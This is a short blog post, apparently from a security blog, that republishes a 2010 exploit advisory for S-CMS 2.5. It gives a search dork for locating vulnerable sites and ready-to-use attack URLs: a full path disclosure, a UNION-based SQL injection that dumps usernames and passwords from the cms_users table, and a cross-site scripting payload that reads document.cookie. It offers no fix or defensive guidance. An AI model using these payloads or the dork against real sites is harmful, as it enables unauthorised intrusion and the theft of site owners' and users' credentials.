Saturday, November 20, 2010

S-CMS 2.5 Multiple Vulnerabilities

0
in

# ============================================================
# Exploit Title: S-CMS Multiple Vuln
# Date: 14/11/2010
# Author: LordTittiS
# Vulnerability Type: Full Path Disclosure / SQL Injection / Cross Site Scripting
# Version: 2.5
# ===========================================================
-Google Dork: inurl:viewforum.php?id= S-Cms
-Exploit:
http://server/s-cms/viewforum.php?id='1 (FPD)

http://server/s-cms/viewforum.php?id=1+union+select+1,2,group_concat(username,0x3a,password),4,5,6,7+from+cms_users-- (SQLi)
http://server/s-cms/viewforum.php?id='1%3E%22%3Cscript%3Ealert(document.cookie)%3C/script%3E (XSS)

0 comments:

Post a Comment

About Me

My photo
Блог за истражување и развој на информациска безбедност, кој е наменет за постирање на најнови ранливости и слабости. Founder darknessn1k0!4

 
Design by ThemeShift | Bloggerized by Lasantha - Free Blogger Templates | Best Web Hosting